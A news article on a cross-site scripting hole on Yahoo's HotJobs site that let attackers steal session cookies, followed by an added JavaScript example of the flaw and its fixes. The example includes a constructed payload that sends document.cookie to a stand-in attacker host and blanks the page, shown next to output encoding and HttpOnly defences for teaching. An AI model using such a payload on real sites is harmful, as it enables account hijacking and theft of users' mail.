A cross-site scripting hole on Yahoo's website, spotted with the Netcraft Toolbar, could be used to steal authentication cookies.
Netcraft's Paul Mutton wrote in a blog post on Monday that the vulnerability was found on Yahoo's HotJobs search engine site, where attackers had been embedding malicious JavaScript.
"The script steals authentication cookies destined for the Yahoo domain and then sends them off to various sites around the U.S. where they are collected by the attacker," Mutton said.
The stolen cookies would let an attacker access the victim's Yahoo account, including Yahoo Mail. The flaw is similar to one that affected another Yahoo property earlier this year.
Mutton noted that simply visiting a malicious URL on the Yahoo site is enough to fall victim: the injected script captures cookies from the victim's current session, letting the attacker get into the victim's Yahoo Mail account without ever entering a username or password. The page returned to the victim is blank, so he or she has no indication that the account has been compromised.
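To make the mechanism concrete, here is an added example that is not code from Netcraft, Yahoo or the HotJobs site. It models a page that reflects a URL parameter into its HTML without encoding, shows a constructed cookie-stealing payload of the kind the article describes (read document.cookie, send it to an off-site host, blank the page), and then shows the two fixes a practitioner would reach for: output encoding on the page, and marking the session cookie HttpOnly so page script cannot read it at all. The host name, cookie names and payload are all assumptions made for the demonstration.

```javascript
// Added example, not code from the original article or from Netcraft/Yahoo.
// Models the reflected-XSS cookie theft the article describes. Every name,
// host and payload below is constructed for illustration.

// Escape the five characters that let untrusted text break out of an HTML
// text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Vulnerable: the search term from the URL is concatenated straight into the page.
function renderSearchVulnerable(term) {
  return `<h1>Results for: ${term}</h1>`;
}

// Hardened: the same page with output encoding applied.
function renderSearchHardened(term) {
  return `<h1>Results for: ${escapeHtml(term)}</h1>`;
}

// Constructed payload in the style the article describes: read the cookies,
// ship them to an attacker-controlled host via an image request, then blank
// the page so the victim sees nothing unusual. The host is hypothetical.
const EXFIL_HOST = 'attacker.example';
const PAYLOAD =
  `<script>new Image().src='http://${EXFIL_HOST}/c?'+encodeURIComponent(document.cookie);` +
  `document.body.innerHTML='';</script>`;

// Crude check for this demo: does the rendered HTML contain a live <script>
// element? A real scanner would parse the HTML rather than pattern-match it.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Build a Set-Cookie header for a session cookie. HttpOnly keeps the value out
// of document.cookie, so even a successful injection cannot read it; Secure
// restricts it to HTTPS. (A mitigation named here as general practice, not
// something the article attributes to Yahoo.)
function sessionCookieHeader(name, value, { httpOnly = true, secure = true } = {}) {
  const attrs = [`${name}=${encodeURIComponent(value)}`, 'Path=/'];
  if (secure) attrs.push('Secure');
  if (httpOnly) attrs.push('HttpOnly');
  return attrs.join('; ');
}

// Simulate what document.cookie exposes to page script: browsers omit
// cookies that were set with the HttpOnly attribute.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Demonstration with constructed inputs.
const vulnerable = renderSearchVulnerable(PAYLOAD);
const hardened = renderSearchHardened(PAYLOAD);
console.log('vulnerable page runs script:', containsScriptTag(vulnerable));
console.log('hardened page runs script:  ', containsScriptTag(hardened));
const headers = [
  sessionCookieHeader('Y', 'session-token-value'),             // HttpOnly
  sessionCookieHeader('pref', 'dark', { httpOnly: false }),      // readable
];
console.log('document.cookie would show:', JSON.stringify(visibleToScript(headers)));
```

The two defences are independent: output encoding stops the script from running in the first place, while HttpOnly limits the damage if some other injection point is missed, since the session cookie then never appears in document.cookie for the payload to read.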
Mutton pointed out that Web sites must protect cookie values. Netcraft has reported the flaw to Yahoo. A Yahoo spokesman could not be reached for comment Monday afternoon.